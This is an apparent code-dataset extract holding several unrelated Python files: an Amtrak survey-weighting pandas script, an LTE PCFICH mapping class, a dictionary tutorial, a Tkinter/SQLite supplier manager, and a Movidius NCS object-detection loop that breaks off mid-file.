Data\\Master Obs Count Data.xlsx\")\n df.dropna(inplace=True, how='all', axis=1)\n #df.head(1)\n \n \n # In[3]:\n \n df['Number of Completed Surveys'].fillna(0, inplace=True)\n df['Sampled Customers (Extracted to WBA)'] = df['Sampled Customers (Extracted to WBA)'].astype('float')\n \n \n # #### Create weight field\n # * Numerator = response counts\n # * (**\"Number of Completed Surveys\"** in HH counts file)\n # * Denominator = sample counts\n # * (**\"Sampled Customers (Extracted to WBA)\"** in HH counts file)\n \n # In[4]:\n \n df['weight'] = df['Number of Completed Surveys']/df['Sampled Customers (Extracted to WBA)']\n \n \n # #### Parse data to Route Code, Route Name, Date, and Weight\n # * Date equates to \"senddate\" for join in WBA daily data files\n \n # In[5]:\n \n parsed = df[['File Run Date', 'Route Name', 'Route Code', 'weight']]\n #parsed.head()\n \n \n # #### Join weights onto Master Short Survey Data\n \n # In[6]:\n \n master = pd.read_excel(r\"S:\\MarketFo\\Short eCSI Raw Data\\Merged Data\\Master Short Survey Data.xlsx\")\n #master.head(1)\n \n \n # In[7]:\n \n routeLkp = {\n 'Lake Shore Limited':'Lake Shore Ltd.',\n 'Capitol Limited':'Capitol Ltd.',\n 'Northeast Regional (Spine) - Business Cl':'Northeast Regional (Spine) - Business Class',\n 'Kansas City-St. Louis':'Kansas City-St. Louis (Missouri River Runner)',\n 'Sunset Limited':'Sunset Ltd.',\n 'Washington - Norfolk':'Washington-Norfolk'\n }\n \n master['Batch Date'] = pd.to_datetime(master['senddate'], format='%Y%m%d')\n master['Norm Route'] = master['ROUTENAME'].apply(lambda x: x if x not in routeLkp.keys() else routeLkp[x])\n \n \n # In[8]:\n \n master_weighted = master.merge(parsed, how='left', left_on=['Batch Date', 'Norm Route', 'RT'], right_on=['File Run Date', 'Route Name', 'Route Code'])\n master_weighted_parsed = master_weighted[[\n 'UNIQ_ID',\n 'LINE',\n 'DATETIM',\n 'ROUTENAME',\n 'RT',\n 'TRAIN',\n 'ORIGIN',\n 'DESTINATION',\n 'C',\n 'DATE',\n 'FD',\n 'CNT',\n 'PNR',\n 'senddate',\n 'RAIL_AMOUNT',\n 'ACCOM_AMT',\n 'VEHICLE_AMT',\n 'TOTALFARE_AMT',\n 'AGR_TIER',\n 'ORIGIN_SCODE',\n 'DESTINATION_SCODE',\n 'TICKET_COUNT',\n 'ELIGIBLE_TICKET_COUNT',\n 'NEW_CUST',\n 'FIRST_TRIP_DATE',\n 'Q1',\n 'Q2',\n 'Q3',\n 'Q4',\n 'Q5',\n 'Q6',\n 'Q7',\n 'Q8',\n 'Q9',\n 'Q10',\n 'Q11',\n 'Batch Date',\n 'weight']]\n #master_weighted_parsed.head()\n \n \n # #### Export to Excel\n \n # In[9]:\n \n master_weighted_parsed.to_excel(r\"S:\\MarketFo\\Short eCSI Raw Data\\Merged Data\\Master Short Survey Data Weighted.xlsx\", index=False)\n \n # ## --------------------- QC --------------------------\n \n # routeLkp = {\n # 'Lake Shore Limited':'Lake Shore Ltd.',\n # 'Capitol Limited':'Capitol Ltd.',\n # 'Northeast Regional (Spine) - Business Cl':'Northeast Regional (Spine) - Business Class',\n # 'Kansas City-St. Louis':'Kansas City-St. Louis (Missouri River Runner)',\n # 'Sunset Limited':'Sunset Ltd.',\n # 'Washington - Norfolk':'Washington-Norfolk'\n # }\n # \n \n # #### Join weights onto WBA daily data master file for QC\n \n # qc = pd.read_excel(r\"C:\\Users\\90012831\\Documents\\eCSI Short Survey Data\\Raw Data\\QC Weighting OVERALL Amtrak Everyday Datafile 0122 v2 weighted data.xlsx\")\n \n # qc['Batch Date'] = pd.to_datetime(qc['senddate'], format='%Y%m%d')\n \n # qc['Norm Route'] = qc['ROUTENAME'].apply(lambda x: x if x not in routeLkp.keys() else routeLkp[x])\n \n # test = qc.merge(df, how='left', left_on=['RT', 'Norm Route', 'Batch Date'], right_on=['Route Code', 'Route Name', 'File Run Date'])\n \n # test['qc'] = test['weight_x'].round(5)==test['weight_y'].round(5)\n \n # #test[test['qc']==False].groupby(['RT', 'Route Code', 'Norm Route', 'Route Name', 'Batch Date', 'File Run Date', 'weight_x', 'weight_y']).agg({'qc':'count'})\n # test[test['qc']==False].groupby(['Norm Route', 'Batch Date', 'File Run Date', 'weight_x', 'Number of Completed Surveys', 'Sampled Customers (Extracted to WBA)', 'weight_y']).agg({'qc':'count'})\n \n # test['weight_x'].describe()\n \n # test['weight_y'].describe()\n \n # test[['Norm Route', 'Batch Date', 'File Run Date', 'weight_x', 'Number of Completed Surveys', 'Sampled Customers (Extracted to WBA)', 'weight_y', 'qc']]","sub_path":"src/python/projects/eCSI Short Survey/1-Production/Archived py Files/Daily_Weight_Creation_and_Assignment.py","file_name":"Daily_Weight_Creation_and_Assignment.py","file_ext":"py","file_size_in_byte":4791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"68525481","text":"__author__ = 'shenojia'\n\nimport sys\nimport numpy as np\nfrom math import floor\nfrom matplotlib.path import Path\nfrom matplotlib.patches import PathPatch\nsys.path.insert(0, '.')\nsys.path.insert(0, '..')\nfrom R12_36211.SLOT import SLOT\nfrom R12_36xxx.TypesDefition import *\nfrom R12_36xxx.HighLayer import conf\n\nclass PCFICH:\n\n def __init__(self,subFrameNumber:int,subFrameType:SubFrameType, MBSFN:bool, PRS:bool):\n # self.res = self._initRes(slot)\n self.res = []\n self.n__s = None\n self.n = subFrameNumber\n self.subFrameType = subFrameType\n self.MBSFN = MBSFN\n self.PRS = PRS\n self.N__OFDM = self._initNumOfOfdmSymb4PDCCH(conf.numOfOfdmSymb4PDCCH)\n self.patch, self.codes, self.vertices = [],[],[]\n\n def _initRes(self, slot:SLOT):\n \"\"\"\n 6.7.4\tMapping to resource elements\n :param slot:\n :return:\n \"\"\"\n res = []\n if slot.n__s!=0:\n return None\n else:\n self.n__s = slot.n__s\n l = 0\n k_bar = conf.N__sc___RB_DL/2*(conf.N__ID___cell%2*conf.N__RB___DL)\n for n in range(4):\n k = k_bar + floor(n*conf.N__RB___DL/2)*conf.N__sc___RB_DL/2\n k___singleQuote = int(k/6)\n l___singleQuote = l\n reg = slot.rgs[0].reg(k___singleQuote, l___singleQuote)\n # reg = slot.rgs[0].regs[(k___singleQuote, l___singleQuote)]\n for re in reg().res:\n if re().t.typeName == 'crs':\n continue\n else:\n res.append(re)\n re().p = 0\n re().a = 0 #TODO: shall initialized with actual precoding result\n re().t = ReType('pcfich')\n\n self.res = res\n self.patch, self.codes, self.vertices = self._initPatch()\n\n\n #TODO: 6.7.1 Scrambling\n #TODO: 6.7.2 Modulation\n #TODO: 6.7.3 Layer mapping and precoding\n def _initNumOfOfdmSymb4PDCCH(self, numOfOfdmSymb4PDCCH:int):\n \"\"\"\n Tabel 6.7-1:Number of OFDM symbols used for PDCCH\n init and assert num of OFDM symbols for PDCCH based on cell configuration\n :param numOfOfdmSymb4PDCCH:\n :return:\n \"\"\"\n\n print(conf.P_crs)\n if (self.n == 1 or self.n == 6) and conf.FrameStructureType.frameStructureTypeName == 'TDD':\n if conf.N__RB___DL > 10:\n assert (numOfOfdmSymb4PDCCH ==1 or numOfOfdmSymb4PDCCH ==2 )\n return numOfOfdmSymb4PDCCH\n else:\n return 2\n elif (self.subFrameType.subFrameTypeName != 'U') and (self.MBSFN == True) and (conf.N__ANT_PORTS <= 2):\n if conf.N__RB___DL > 10:\n assert (numOfOfdmSymb4PDCCH ==1 or numOfOfdmSymb4PDCCH ==2 )\n return numOfOfdmSymb4PDCCH\n else:\n return 2\n elif self.subFrameType.subFrameTypeName != 'U' and self.MBSFN == True and conf.N__ANT_PORTS == 4:\n return 2\n elif self.subFrameType.subFrameTypeName == 'U':\n return 0\n elif self.MBSFN == False and self.PRS == True and (self.n != 6 and conf.FrameStructureType.frameStructureTypeName == 'TDD'):\n if conf.N__RB___DL > 10:\n assert (numOfOfdmSymb4PDCCH == 1 or numOfOfdmSymb4PDCCH == 2 or numOfOfdmSymb4PDCCH == 3 )\n return numOfOfdmSymb4PDCCH\n else:\n assert (numOfOfdmSymb4PDCCH == 2 or numOfOfdmSymb4PDCCH == 3 )\n return numOfOfdmSymb4PDCCH\n else:\n if conf.N__RB___DL > 10:\n assert (numOfOfdmSymb4PDCCH == 1 or numOfOfdmSymb4PDCCH == 2 or numOfOfdmSymb4PDCCH == 3 )\n return numOfOfdmSymb4PDCCH\n else:\n assert (numOfOfdmSymb4PDCCH == 2 or numOfOfdmSymb4PDCCH == 3 or numOfOfdmSymb4PDCCH == 4)\n return numOfOfdmSymb4PDCCH\n\n def _initPatch(self):\n \"\"\"\n deprecated!!!!\n get pathPatches for plotting res for CRS of dedicate port\n :return:\n \"\"\"\n codes = []\n vertices = []\n for re in self.res:\n codes += re().codes\n vertices += re().vertices\n\n path = Path(vertices, codes)\n patch = PathPatch(path, facecolor='white', edgecolor='black', linewidth=0.2, fill='none')\n patch.set_zorder(90)\n return patch, codes, vertices","sub_path":"R12_36211/PCFICH.py","file_name":"PCFICH.py","file_ext":"py","file_size_in_byte":4392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"531422670","text":"\n\"\"\"\nExecute the below code in a cell by cell and see the output. There are Assignments to do it by your own, so complete that as well\nUse Spyder to run and execute these .py files\n\"\"\"\n\nfruit_basket = {\"Apple\": \"Red\", \"Orange\": \"Orange\", \"Banana\": \"Yellow\"}\nfruit_basket['Apple']\nfruit_basket['Orange']\nfruit_basket[\"strawberry\"] = \"Red\" # adding new element\ndel fruit_basket[\"strawberry\"] # deleting on key\n\n\n# Accesing Values from Dictionary\n\n\nfruits = {\"Apple\": [\"Red\", \"round\"], \"Orange\": [\"Orange\", \"round\"], \"Banana\": [\"Yellow\", \"hook\"]}\nfruits[\"Apple\"][0]\nfruits[\"Orange\"][0]\n\n\n# Accesing all the keys and values\n\nfruits.keys()\nfruits.values()\n\nfor k in fruits:\n print(k, fruits[k])\n\n\n\n# Multi dimensional Dictionary\n\nfruits = {\"fruits_name\":{\n \"Apple\":{\n \"color\":\"red\",\n \"Shape\": \"round\"\n \n },\n \n \"Orange\":{\n \"color\":\"Orange\",\n \"Shape\": \"round\"\n }\n}}\n\nfruits[\"fruits_name\"]\nfruits[\"fruits_name\"][\"Apple\"]\n\n\n## python Dictionary Comprehension\n\nsquares = {x: x**x for x in range(1,10)}\neven_numbers = {x: x**x for x in range(1,10) if x%2==0}\n\n\n\n\n","sub_path":"05_dictionary.py","file_name":"05_dictionary.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"623743077","text":"import sqlite3\nimport datetime\nfrom tkinter import *\nfrom tkinter import filedialog, messagebox, ttk\n\n\nclass Proveedores:\n\n db_name = 'BaseDatos.db' \n\n def Inicio(self):\n # Ventana principal \n ventana = Tk()\n self.icono = \"@../GrupoD-Proyecto/Iconos/Registradora.xbm\"\n ventana.iconbitmap(self.icono)\n ventana.resizable(0,0)\n ventana.config(bg = \"#83D6A8\")\n ox, oy = ventana.winfo_screenwidth()/2, ventana.winfo_screenwidth()/2\n ventana.geometry(\"=1300x244+%d+%d\" % (ox-650, oy-450))\n self.titulo = \"Proveedores\"\n ventana.title(self.titulo)\n\n # Creacion de frame contenedor\n frame = LabelFrame(ventana, text = 'Carga proveedor: ')\n frame.config(bg = \"#83D6A8\", pady = 12)\n frame.grid(row = 0, column = 0, columnspan = 3, sticky = W + E)\n\n frame_tabla = LabelFrame(ventana, text = 'Proveedores: ')\n frame_tabla.config(bg = \"#83D6A8\")\n frame_tabla.grid(row = 0, column = 10, columnspan = 3, sticky = W + E)\n self.mensaje2 = Label(frame_tabla, text = '', font = (\"arial 14\"), bg = \"#83D6A8\")\n self.mensaje2.grid(row = 0, column = 0)\n\n val_num = (frame.register(self.lee_numero), '%S')\n val_str = (frame.register(self.lee_str), '%S')\n\n # Entrada Empresa\n Label(frame, text = 'Empresa: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 1, column = 0)\n self.empresa = Entry(frame, validate = 'key', validatecommand = val_str)\n self.empresa.focus()\n self.empresa.grid(row = 1, column = 1)\n\n # Entrada CUIT Empresa\n Label(frame, text = 'CUIT Empresa: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 2, column = 0)\n self.cuit_empresa = Entry(frame, validate = 'key', validatecommand = val_num)\n self.cuit_empresa.focus()\n self.cuit_empresa.grid(row = 2, column = 1)\n\n\n # Entrada Nombre-Contacto\n Label(frame, text = 'Nombre: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 3, column = 0)\n self.nombre = Entry(frame, validate = 'key', validatecommand = val_str)\n self.nombre.focus()\n self.nombre.grid(row = 3, column = 1)\n\n # Entrada DNI\n Label(frame, text = 'DNI: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 4, column = 0)\n self.dni = Entry(frame, validate = 'key', validatecommand = val_num)\n self.dni.focus()\n self.dni.grid(row = 4, column = 1)\n\n # Entrada Celular\n Label(frame, text = 'Celular: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 5, column = 0)\n self.celular = Entry(frame, validate = 'key', validatecommand = val_num)\n self.celular.focus()\n self.celular.grid(row = 5, column = 1)\n\n # Entrada Correo\n Label(frame, text = 'Correo: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 6, column = 0)\n self.correo = Entry(frame)\n self.correo.focus()\n self.correo.grid(row = 6, column = 1)\n\n # Entrada Fecha\n self.fecha = datetime.datetime.now().date()\n\n # Tabla\n self.tabla = ttk.Treeview(frame_tabla, height = 7, columns = ('#1','#2','#3','#4','#5', '#6'))\n self.tabla.grid(row = 0, column = 0, columnspan = 2, sticky= W)\n self.tabla.heading('#0', text = 'Fecha', anchor = CENTER)\n self.tabla.heading('#1', text = 'Empresa', anchor = CENTER)\n self.tabla.heading('#2', text = 'CUIT Empresa', anchor = CENTER)\n self.tabla.heading('#3', text = 'Nombre', anchor = CENTER)\n self.tabla.heading('#4', text = 'DNI', anchor = CENTER)\n self.tabla.heading('#5', text = 'Celular', anchor = CENTER)\n self.tabla.heading('#6', text = 'Correo', anchor = CENTER)\n\n self.tabla.column('#0', width = 100, stretch = False, anchor = CENTER)\n self.tabla.column('#1', width = 175, stretch = False, anchor = CENTER)\n self.tabla.column('#2', width = 115, stretch = False, anchor = CENTER)\n self.tabla.column('#3', width = 175, stretch = False, anchor = CENTER)\n self.tabla.column('#4', width = 75, stretch = False, anchor = CENTER)\n self.tabla.column('#5', width = 100, stretch = False, anchor = CENTER)\n self.tabla.column('#6', width = 215, stretch = False, anchor = CENTER)\n\n # Botones\n ttk.Button(frame, text = 'GUARDAR', command = self.cargar_datos).grid(row = 12, column = 1, sticky = W + E)\n boton_editar = ttk.Button(frame_tabla, text = 'EDITAR', command = self.editar)\n boton_editar.config(width = 58)\n boton_editar.grid(row = 10, column = 0)\n boton_borrar = ttk.Button(frame_tabla, text = 'BORRAR', command = self.borrar)\n boton_borrar.config(width = 58)\n boton_borrar.grid(row = 10, column = 1)\n\n self.obtener_dato()\n ventana.mainloop()\n\n # 'chekeo' de la tabla \n def ejecuta_consulta(self, consulta, parametros = ()):\n with sqlite3.connect(self.db_name) as conn:\n cursor = conn.cursor() \n resultado = cursor.execute(consulta, parametros)\n conn.commit()\n return resultado\n raise Exception(' NO SE PUDO CONECTAR A LA BASE DE DATOS. ')\n\n # Limpia tabla\n def obtener_dato(self):\n graba = self.tabla.get_children()\n for elemento in graba:\n self.tabla.delete(elemento)\n consulta = 'SELECT * FROM Proveedores'\n filas_bd = self.ejecuta_consulta(consulta)\n for row in filas_bd:\n self.tabla.insert('', 0, text = row[1], values = (row[2], row[3], row[4], row[5], row[6], row[7]))\n\n # Validacion general (todos los campos estan llenos)\n def validacion(self):\n if (len(self.empresa.get()) != 0 and len(self.cuit_empresa.get()) != 0 and len(self.nombre.get()) != 0 and len(self.dni.get()) != 0 and len(self.celular.get()) != 0 and len(self.correo.get()) != 0):\n return TRUE\n else:\n return FALSE\n\n # Validacion Numeros\n @staticmethod\n def lee_numero(aux_0):\n return aux_0.isdigit()\n \n # Validacion Str\n @staticmethod\n def lee_str(aux_1):\n if aux_1.isalpha() or aux_1.isspace():\n return True\n else:\n return False\n\n # Funcion para cargar\n def cargar_datos(self):\n if self.validacion() == TRUE:\n consult = 'INSERT INTO Proveedores VALUES(NULL, ?, ?, ?, ?, ?, ?, ?)'\n parametros = (self.fecha, self.empresa.get(), self.cuit_empresa.get(), self.nombre.get(), self.dni.get(), self.celular.get(), self.correo.get())\n self.ejecuta_consulta(consult, parametros)\n self.obtener_dato()\n self.empresa.delete(0, END)\n self.cuit_empresa.delete(0, END)\n self.nombre.delete(0, END)\n self.dni.delete(0, END)\n self.celular.delete(0, END)\n self.correo.delete(0, END)\n\n # Funcion para borrar\n\n def borrar (self):\n \n if self.tabla.item(self.tabla.selection())['text'] == '':\n self.mensaje2['text'] = 'Por favor, seleccione un elemento'\n return\n empresa = self.tabla.item(self.tabla.selection())['values'][0]\n consulta = 'DELETE FROM Proveedores WHERE empresa = ?'\n self.ejecuta_consulta(consulta, (empresa, ))\n self.mensaje2['text'] = 'Se a eliminado a {} de tu lista de proveedores. '.format(empresa)\n self.obtener_dato()\n \n # Funcion para editar\n\n def editar (self):\n\n # Funcion editar valores\n self.mensaje2[\"text\"] = ''\n if self.tabla.item(self.tabla.selection())[\"text\"] == \"\":\n self.mensaje2[\"text\"] = \"Por favor, seleccione un elemento\"\n return\n\n # tabla editar valores\n empresa = self.tabla.item(self.tabla.selection())[\"values\"][0]\n cuit_empresa = self.tabla.item(self.tabla.selection())[\"values\"][1]\n nombre = self.tabla.item(self.tabla.selection())[\"values\"][2]\n dni = self.tabla.item(self.tabla.selection())[\"values\"][3]\n celular = self.tabla.item(self.tabla.selection())[\"values\"][4]\n correo = self.tabla.item(self.tabla.selection())[\"values\"][5]\n\n self.ventana_de_edicion = Toplevel()\n self.ventana_de_edicion.title = (\"Editar\")\n self.ventana_de_edicion.config(background=\"#83D6A8\")\n self.ventana_de_edicion.resizable(0, 0)\n self.ventana_de_edicion.config(bd=5)\n self.ventana_de_edicion.config(relief= \"solid\")\n\n #Frame Ventana Edicion\n frame69 = LabelFrame(self.ventana_de_edicion, text = '')\n frame69.config(bg = \"#83D6A8\")\n frame69.grid(row = 0, column = 0)\n\n val_num = (frame69.register(self.lee_numero), '%S')\n val_str = (frame69.register(self.lee_str), '%S')\n \n # Antiguo nombre empresa\n Label(frame69, text = 'Antigua empresa: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 0, column = 1)\n Entry(frame69, textvariable = StringVar(self.ventana_de_edicion, value = empresa), state = 'readonly').grid(row = 0, column = 2)\n\n # Nuevo nombre empresa \n Label(frame69, text = 'Nueva empresa: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 0, column = 3)\n nuevo_nombre_empresa = Entry(frame69, validate = 'key', validatecommand = val_str)\n nuevo_nombre_empresa.grid(row = 0, column = 4)\n\n # Antiguo Cuit Empresa\n Label(frame69, text = 'Antiguo CUIT: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 1, column = 1)\n Entry(frame69, textvariable = StringVar(self.ventana_de_edicion, value = cuit_empresa), state = 'readonly').grid(row = 1, column = 2)\n\n # Nuevo CUIT Empresa\n Label(frame69, text = 'Nuevo CUIT: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 1, column = 3)\n nuevo_cuit_empresa = Entry(frame69, validate = 'key', validatecommand = val_num)\n nuevo_cuit_empresa.grid(row = 1, column = 4)\n\n # Antiguo nombre\n Label(frame69, text = 'Antiguo nombre: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 2, column = 1)\n Entry(frame69, textvariable = StringVar(self.ventana_de_edicion, value = nombre), state = 'readonly').grid(row = 2, column = 2)\n\n # Nuevo Nombre\n Label(frame69, text = 'Nuevo nombre: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 2, column = 3)\n nuevo_nombre = Entry(frame69, validate = 'key', validatecommand = val_str)\n nuevo_nombre.grid(row = 2, column = 4) \n\n # Antiguo DNI\n Label(frame69, text = 'Antiguo DNI: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 3, column = 1)\n Entry(frame69, textvariable = StringVar(self.ventana_de_edicion, value = dni), state = 'readonly').grid(row = 3, column = 2)\n\n # Nuevo DNI\n Label(frame69, text = 'Nuevo DNI: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 3, column = 3)\n nuevo_dni = Entry(frame69, validate = 'key', validatecommand = val_num)\n nuevo_dni.grid(row = 3, column = 4)\n\n # Antiguo celular\n Label(frame69, text = 'Antiguo numero: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 4, column = 1)\n Entry(frame69, textvariable = StringVar(self.ventana_de_edicion, value = celular), state = 'readonly').grid(row = 4, column = 2)\n\n # Nuevo celular\n Label(frame69, text = 'Nuevo celular', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 4, column = 3)\n nuevo_celular = Entry(frame69, validate = 'key', validatecommand = val_num)\n nuevo_celular.grid(row = 4, column = 4)\n\n # Antiguo correo\n Label(frame69, text = 'Antiguo correo: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 5, column = 1)\n Entry(frame69, textvariable = StringVar(self.ventana_de_edicion, value = correo), state = 'readonly').grid(row = 5, column = 2)\n\n # Nuevo correo\n Label(frame69, text = 'Nuevo correo', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 5, column = 3)\n nuevo_correo = Entry(frame69)\n nuevo_correo.grid(row = 5, column = 4)\n\n ttk.Button(self.ventana_de_edicion, text = 'Guardar cambios', command = lambda: self.editar_valores(nuevo_nombre_empresa.get(),nuevo_cuit_empresa.get(), nuevo_nombre.get(), nuevo_dni.get(), nuevo_celular.get(), nuevo_correo.get(), empresa)).grid(row = 8, column = 0, sticky = W + E)\n self.ventana_de_edicion.mainloop()\n \n # Funcion para editar productos (dentro del boton, parte 2)\n def editar_valores(self, nuevo_nombre_empresa, nuevo_cuit_empresa, nuevo_nombre, nuevo_dni, nuevo_celular, nuevo_correo, empresa):\n consulta = 'UPDATE proveedores SET empresa = ?, Cuit_Empresa = ?, nombre = ?, dni = ?, celular = ?, correo = ? WHERE empresa = ?'\n parametros = (nuevo_nombre_empresa, nuevo_cuit_empresa, nuevo_nombre, nuevo_dni, nuevo_celular, nuevo_correo, empresa)\n self.ejecuta_consulta(consulta, parametros)\n self.ventana_de_edicion.destroy()\n self.obtener_dato()\n","sub_path":"Proveedores.py","file_name":"Proveedores.py","file_ext":"py","file_size_in_byte":12960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"38611278","text":"\n# import the necessary packages\nfrom mvnc import mvncapi as mvnc\nfrom imutils.video import VideoStream\nimport numpy as np\nimport time\nimport datetime\nimport cv2\n\nconfidence_basic=0.5\ndisplay = 1\ntime_calc = 1\nRPI = 0\n\nfps = 0\nfps_time_new = 0\nfps_time_old = datetime.datetime.now()\ni_fps = 3\ni_cycle = 0\nfps_delta = 0\n\ntimef = np.zeros(100)\n\n\n# initialize the list of class labels our network was trained to\n# detect, then generate a set of bounding box colors for each class\nCLASSES = (\"background\", \"aeroplane\", \"bicycle\", \"bird\",\n \"boat\", \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\",\n \"diningtable\", \"dog\", \"horse\", \"motorbike\", \"person\",\n \"pottedplant\", \"sheep\", \"sofa\", \"train\", \"tvmonitor\")\nCOLORS = np.random.uniform(0, 255, size=(len(CLASSES), 3))\n\n# frame dimensions should be sqaure\nPREPROCESS_DIMS = (300, 300)\nDISPLAY_DIMS = (640, 480)\n\n# calculate the multiplier needed to scale the bounding boxes\nDISP_MULTIPLIER = DISPLAY_DIMS[0] // PREPROCESS_DIMS[0]\n\n\ndef Time_saving(t_number):\n if time_calc == 1:\n timef[t_number] = time.time()\n return 0\n\ndef Time_print(t_number):\n if time_calc == 1:\n print(\"time %1s: %1.1f ms\" % (t_number, (time.time() - timef[t_number])*1000))\n return 0\n\ndef preprocess_image(input_image):\n # preprocess the image\n preprocessed = cv2.resize(input_image, PREPROCESS_DIMS)\n preprocessed = preprocessed - 127.5\n preprocessed = preprocessed * 0.007843\n preprocessed = preprocessed.astype(np.float16)\n\n # return the image to the calling function\n return preprocessed\n\n\ndef predict(image, graph):\n # preprocess the image\n image = preprocess_image(image)\n\n # send the image to the NCS and run a forward pass to grab the\n # network predictions\n graph.LoadTensor(image, None)\n (output, _) = graph.GetResult()\n\n # grab the number of valid object predictions from the output,\n # then initialize the list of predictions\n num_valid_boxes = output[0]\n predictions = []\n\n # loop over results\n for box_index in range(int(num_valid_boxes)):\n # calculate the base index into our array so we can extract\n # bounding box information\n base_index = 7 + box_index * 7\n\n # boxes with non-finite (inf, nan, etc) numbers must be ignored\n if (not np.isfinite(output[base_index]) or\n not np.isfinite(output[base_index + 1]) or\n not np.isfinite(output[base_index + 2]) or\n not np.isfinite(output[base_index + 3]) or\n not np.isfinite(output[base_index + 4]) or\n not np.isfinite(output[base_index + 5]) or\n not np.isfinite(output[base_index + 6])):\n continue\n\n # extract the image width and height and clip the boxes to the\n # image size in case network returns boxes outside of the image\n # boundaries\n (h, w) = image.shape[:2]\n x1 = max(0, int(output[base_index + 3] * w))\n y1 = max(0, int(output[base_index + 4] * h))\n x2 = min(w, int(output[base_index + 5] * w))\n y2 = min(h, int(output[base_index + 6] * h))\n\n # grab the prediction class label, confidence (i.e., probability),\n # and bounding box (x, y)-coordinates\n pred_class = int(output[base_index + 1])\n pred_conf = output[base_index + 2]\n pred_boxpts = ((x1, y1), (x2, y2))\n\n # create prediciton tuple and append the prediction to the\n # predictions list\n prediction = (pred_class, pred_conf, pred_boxpts)\n predictions.append(prediction)\n\n # return the list of predictions to the calling function\n return predictions\n\n\n# grab a list of all NCS devices plugged in to USB\nprint(\"[INFO] finding NCS devices...\")\ndevices = mvnc.EnumerateDevices()\n\n# if no devices found, exit the script\nif len(devices) == 0:\n print(\"[INFO] No devices found. Please plug in a NCS\")\n quit()\n\n# use the first device since this is a simple test script\n# (you'll want to modify this is using multiple NCS devices)\nprint(\"[INFO] found {} devices. device0 will be used. \"\n \"opening device0...\".format(len(devices)))\ndevice = mvnc.Device(devices[0])\ndevice.OpenDevice()\n\n# open the CNN graph file\nprint(\"[INFO] loading the graph file into RPi memory...\")\nwith open('graphs/mobilenetgraph', mode=\"rb\") as f:\n graph_in_memory = f.read()\n\n# load the graph into the NCS\nprint(\"[INFO] allocating the graph on the NCS...\")\ngraph = device.AllocateGraph(graph_in_memory)\n\n#add text\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\n# open a pointer to the video stream thread and allow the buffer to\nprint(\"[INFO] starting the video stream and FPS counter...\")\nif RPI==0:\n vs = VideoStream(src=0).start()\nelse:\n vs = VideoStream(usePiCamera=True).start()\ntime.sleep(1)\n\n# loop over frames from the video file stream\nwhile True:\n try:\n # grab the frame from the threaded video stream\n # make a copy of the frame and resize it for display/video purposes\n Time_saving(0)\n frame = vs.read()\n Time_print(0)\n Time_saving(1)\n image_for_result = frame.copy()\n Time_print(1)\n Time_saving(2)\n image_for_result = cv2.resize(image_for_result, DISPLAY_DIMS)\n Time_print(2)\n\n # use the NCS to acquire predictions\n Time_saving(3)\n predictions = predict(frame, graph)\n Time_print(3)\n\n # loop over our predictions\n for (i, pred) in enumerate(predictions):\n # extract prediction data for readability\n Time_saving(4)\n (pred_class, pred_conf, pred_boxpts) = pred\n Time_print(4)\n\n # filter out weak detections by ensuring the `confidence`\n # is greater than the minimum confidence\n if pred_conf > confidence_basic:\n # print prediction to terminal\n #print(\"[INFO] Prediction #{}: class={}, confidence={}, \"\"boxpoints={}\".format(i, CLASSES[pred_class], pred_conf,pred_boxpts))\n\n # check if we should show the prediction data\n # on the frame\n Time_saving(5)\n if display > 0:\n # build a label consisting of the predicted class and\n # associated probability\n label = \"{}: {:.2f}%\".format(CLASSES[pred_class],\n pred_conf * 100)\n\n # extract information from the prediction boxpoints\n (ptA, ptB) = (pred_boxpts[0], pred_boxpts[1])\n ptA = (ptA[0] * DISP_MULTIPLIER, ptA[1] * DISP_MULTIPLIER)\n ptB = (ptB[0] * DISP_MULTIPLIER, ptB[1] * DISP_MULTIPLIER)\n (startX, startY) = (ptA[0], ptA[1])\n y = startY - 15 if startY - 15 > 15 else startY + 15\n\n # display the rectangle and label text\n cv2.rectangle(image_for_result, ptA, ptB,\n COLORS[pred_class], 2)\n cv2.putText(image_for_result, label, (startX, y),\n cv2.FONT_HERSHEY_SIMPLEX, 1, COLORS[pred_class], 3)\n Time_print(5)\n\n # FPS calculation\n Time_saving(6)\n fps_time_new = datetime.datetime.now()\n fps_delta = (fps_time_new - fps_time_old).total_seconds()\n fps_time_old = fps_time_new\n print(\"%1.2ffps\" % fps)\n\n\n if i_cycle == i_fps:\n fps = 1 / float(fps_delta)\n i_cycle = 0\n else:\n i_cycle += 1\n\n cv2.putText(image_for_result, \"%1.1f fps\" % fps, (10, 30),\n font, 1, (0, 0, 255), 2, cv2.LINE_AA)\n Time_print(6)\n # check if we should display the frame on the screen\n # with prediction data (you can achieve faster FPS if you\n # do not output to the screen)\n if display > 0:\n # display the frame to the screen\n Time_saving(7)\n cv2.imshow(\"Output\", image_for_result)\n Time_print(7)\n\n #wait escape\n if cv2.waitKey(1) & 0xFF == 27:\n break\n print(\"time lap: %1.3f\" % fps_delta)\n\n # if \"ctrl+c\" is pressed in the terminal, break from the loop\n except KeyboardInterrupt:\n break\n\n # if there's a 